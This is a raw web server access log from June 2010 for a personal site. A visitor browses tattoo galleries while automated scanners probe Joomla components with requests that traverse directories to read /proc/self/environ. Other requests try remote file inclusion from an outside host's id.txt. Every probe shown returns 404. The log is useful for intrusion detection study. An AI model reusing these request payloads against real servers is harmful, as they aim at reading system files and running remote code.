91.203.13.114 - - [27/Jun/2010:08:51:29 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:29 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:29 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:29 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:30 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:30 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:31 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:51:31 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
79.170.45.162 - - [27/Jun/2010:08:51:56 -0500] "GET /logs/access_log.1276819200///index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.836"
79.170.45.162 - - [27/Jun/2010:08:51:56 -0500] "GET ///index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.836"
79.170.45.162 - - [27/Jun/2010:08:51:57 -0500] "GET /logs///index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.836"
79.170.45.162 - - [27/Jun/2010:08:51:59 -0500] "GET /logs/access_log.1276732800///index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.836"
213.165.85.241 - - [27/Jun/2010:08:52:02 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.203.13.114 - - [27/Jun/2010:08:52:32 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:52:33 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:52:33 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:52:33 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:52:33 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:52:33 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:52:33 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:52:33 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:52:33 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:52:33 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:52:37 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:52:39 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:52:41 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
207.46.13.47 - - [27/Jun/2010:08:53:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.47 - - [27/Jun/2010:08:53:41 -0500] "GET /logs/access_log.1196726400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.203.13.114 - - [27/Jun/2010:08:54:23 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:54:23 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:54:23 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:54:23 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:54:23 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:54:23 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:54:23 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:54:23 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:54:23 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:54:24 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:54:24 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:54:25 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
67.228.107.2 - - [27/Jun/2010:08:54:34 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:54:40 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:54:41 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:54:48 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:54:59 -0500] "GET /logs/access_log.1274572800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:54:59 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:54:59 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.13.114 - - [27/Jun/2010:08:55:04 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:05 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:05 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:05 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:05 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:05 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:06 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:06 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
67.228.107.2 - - [27/Jun/2010:08:55:07 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.13.114 - - [27/Jun/2010:08:55:08 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:08 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:11 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:13 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:15 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:16 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:17 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:23 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
67.228.107.2 - - [27/Jun/2010:08:55:25 -0500] "GET /logs/access_log.1276041600//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:55:25 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:55:25 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:55:26 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:55:26 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:55:26 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:55:31 -0500] "GET /logs/access_log.1276732800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:55:37 -0500] "GET /logs/access_log.1274572800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
91.203.13.114 - - [27/Jun/2010:08:55:40 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:42 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:42 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:55:42 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
213.165.85.241 - - [27/Jun/2010:08:55:45 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:55:46 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:55:46 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:55:47 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.228.107.2 - - [27/Jun/2010:08:55:48 -0500] "GET /logs/access_log.1274572800//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:55:48 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.107.2 - - [27/Jun/2010:08:55:48 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
216.38.49.38 - - [27/Jun/2010:08:55:49 -0500] "GET /logs/access_log.1276819200///index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:08:55:50 -0500] "GET ///index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:08:55:50 -0500] "GET /logs///index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.831"
213.165.85.241 - - [27/Jun/2010:08:55:52 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.38.49.38 - - [27/Jun/2010:08:55:56 -0500] "GET /logs/access_log.1276732800///index2.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.831"
91.203.13.114 - - [27/Jun/2010:08:56:04 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/bonus.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
91.203.13.114 - - [27/Jun/2010:08:56:07 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.52 (Windows NT 5.1; U; ru)"
213.165.85.241 - - [27/Jun/2010:08:56:11 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:56:11 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:56:12 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:56:12 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
201.20.37.144 - - [27/Jun/2010:08:56:23 -0500] "GET /logs/access_log.1276473600//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
201.20.37.144 - - [27/Jun/2010:08:56:23 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
201.20.37.144 - - [27/Jun/2010:08:56:23 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
67.228.107.2 - - [27/Jun/2010:08:56:29 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
213.165.85.241 - - [27/Jun/2010:08:56:30 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.231.187.33 - - [27/Jun/2010:08:56:38 -0500] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
193.231.187.33 - - [27/Jun/2010:08:56:39 -0500] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
193.231.187.33 - - [27/Jun/2010:08:56:39 -0500] "GET /logs/access_log.1275264000//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.810"
213.165.85.241 - - [27/Jun/2010:08:56:40 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.231.187.33 - - [27/Jun/2010:08:56:48 -0500] "GET /logs/access_log.1275264000%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
213.165.85.241 - - [27/Jun/2010:08:57:06 -0500] "GET /logs/access_log.1276732800//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:57:06 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:57:07 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:08:57:09 -0500] "GET /logs/access_log.1275264000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
206.71.53.4 - - [27/Jun/2010:08:57:19 -0500] "GET /logs/access_log.1276819200//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:57:19 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:57:19 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:57:25 -0500] "GET /logs/access_log.1276128000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:57:41 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:57:41 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
206.71.53.4 - - [27/Jun/2010:08:57:41 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
